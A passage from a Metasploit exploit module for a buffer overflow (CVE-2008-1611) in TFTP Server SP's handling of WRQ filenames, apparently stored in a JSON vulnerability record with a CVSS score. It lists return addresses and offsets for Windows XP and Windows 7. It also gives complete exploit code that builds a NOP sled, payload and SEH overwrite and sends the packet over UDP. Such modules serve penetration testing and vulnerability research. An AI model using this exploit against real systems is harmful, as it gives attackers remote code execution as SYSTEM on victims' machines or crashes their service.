The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result a denial-of-service.\n },\n 'Author' =>\n [\n 'Mati Aharoni', #Initial discovery, PoC\n 'Datacut' #Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2008-1611' ],\n [ 'OSVDB', '43785' ],\n [ 'BID', '18345' ],\n [ 'EDB', '5314' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' =>'seh',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x2f\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.\n # possible may work for other service packs and or vista\n # Rets = P/P/R from tftpserversp.exe\n [ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],\n [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],\n [ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],\n [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],\n [ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],\n [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]\n ],\n 'Privileged'\t=> false,\n 'DisclosureDate'=> 'Mar 26 
2008',\n 'DefaultTarget' => 4)) #TFTP is installed as a service\n\n register_options(\n [\n Opt::RPORT(69)\n ])\n end\n\n\n def exploit\n connect_udp\n\n nops = make_nops(50)\n lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)\n near = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled\n nseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump\n\n evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')\n mode = \"netascii\"\n\n #Send the WRQ packet (header \"\\x00\\x02\")\n sploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\"\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb"}]}